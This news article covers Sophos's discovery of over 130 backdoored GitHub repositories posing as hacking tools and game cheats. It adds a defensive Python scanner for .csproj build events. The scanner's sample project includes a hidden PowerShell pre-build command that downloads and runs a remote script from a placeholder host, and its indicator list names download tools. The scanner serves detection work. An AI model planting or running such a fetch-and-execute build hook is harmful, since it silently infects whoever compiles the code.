Widespread Campaign Targets Cybercriminals and Gamers

A large-scale operation planting malicious code in open-source projects on GitHub has been uncovered by cybersecurity researchers.
The scheme, centered on a developer using the alias ischhfd83, involves over 130 backdoored repositories disguised as malware tools or game cheats.
A Booby-Trapped Malware Toolkit
The investigation began when a Sophos customer queried the safety of a GitHub-hosted project called Sakura RAT. While the tool itself appeared broken, researchers found it contained a hidden backdoor, targeted not at businesses but at fellow cybercriminals and novice hackers.
The Sakura RAT code included a “PreBuild” event, which silently downloaded additional malware during compilation. This was the first clue in what became a deep investigation into weaponized repositories.
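One defensive check a practitioner could run before compiling an untrusted repository, shown here as an added example that is not code from the Sophos report or from this article: it parses a Visual Studio .csproj file and flags pre-build, post-build or Exec commands that appear to fetch remote content at build time. The sample project file, the indicator list and the URL in it are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

# Substrings that commonly appear in build-event commands reaching out to the
# network. Constructed heuristic list, not taken from the Sophos report.
DOWNLOAD_INDICATORS = (
    "invoke-webrequest", "iwr ", "downloadstring", "downloadfile", "curl ",
    "wget ", "bitsadmin", "certutil", "-enc", "http://", "https://",
)

def _strip_ns(tag):
    """Drop the MSBuild XML namespace (present in legacy .csproj files)."""
    return tag.split("}", 1)[-1]

def find_build_events(csproj_xml):
    """Return (kind, command) for every build-time command in a .csproj string.

    Covers the <PreBuildEvent>/<PostBuildEvent> properties and any
    <Exec Command="..."/> task inside a <Target>.
    """
    root = ET.fromstring(csproj_xml)
    events = []
    for el in root.iter():
        tag = _strip_ns(el.tag)
        if tag in ("PreBuildEvent", "PostBuildEvent") and (el.text or "").strip():
            events.append((tag, el.text.strip()))
        elif tag == "Exec" and el.get("Command"):
            events.append(("Exec", el.get("Command")))
    return events

def suspicious_build_events(csproj_xml):
    """Return build events whose command looks like it fetches remote content."""
    flagged = []
    for kind, cmd in find_build_events(csproj_xml):
        low = cmd.lower()
        hits = [i for i in DOWNLOAD_INDICATORS if i in low]
        if hits:
            flagged.append({"kind": kind, "command": cmd, "indicators": hits})
    return flagged

# Constructed sample: a benign copy step plus a pre-build event that pulls and
# runs a remote script (hypothetical URL, for the demo only).
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -w hidden -c "iwr https://example.invalid/p.ps1 | iex"</PreBuildEvent>
  </PropertyGroup>
  <Target Name="CopyAssets" BeforeTargets="Build">
    <Exec Command="xcopy /y assets\\*.png $(OutDir)" />
  </Target>
</Project>"""

if __name__ == "__main__":
    for f in suspicious_build_events(SAMPLE_CSPROJ):
        print(f"[{f['kind']}] {f['command']}  <- {', '.join(f['indicators'])}")
```

The heuristic only catches commands that fetch content directly; a build event that merely runs a script already checked into the repository still warrants reading that script before building.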
Sophos analysts traced the email address embedded in the malware, uncovering 141 repositories, 133 of which were backdoored, impersonating:
Automation, Obfuscation and Deception
The threat actor used automation to maintain the illusion of active development. Repositories were filled with thousands of auto-generated commits using GitHub Actions workflows. Most owners had only a few other projects, and contributor accounts followed strict patterns, suggesting a coordinated structure.
Malware was often hosted in GitHub releases or on paste sites, with infection chains hidden in layers of obfuscated code across formats, including PowerShell, Python, JavaScript and Windows screensavers.
While the final payloads varied, they often delivered known threats like Lumma Stealer or AsyncRAT. Researchers believe many of these projects were seeded across forums and social platforms to lure unsuspecting users into compiling and running the backdoored tools.
Implications for Supply Chain Security
Sophos suggests this operation may be tied to a broader Distribution-as-a-Service (DaaS) model previously reported in 2024.
Some code artifacts and infrastructure overlap with past campaigns, but whether the same actor is responsible remains unclear.
Sophos has reported all known active repositories and paste sites to the relevant platforms. Most have since been taken down.
“Ironically, the threat actor seems to predominantly target cheating gamers and inexperienced cybercriminals,” said the research team.
“It’s also worth noting that malware doesn’t usually care who it ends up infecting, and so other groups may also have been infected – including people experimenting with open-source repositories out of curiosity.”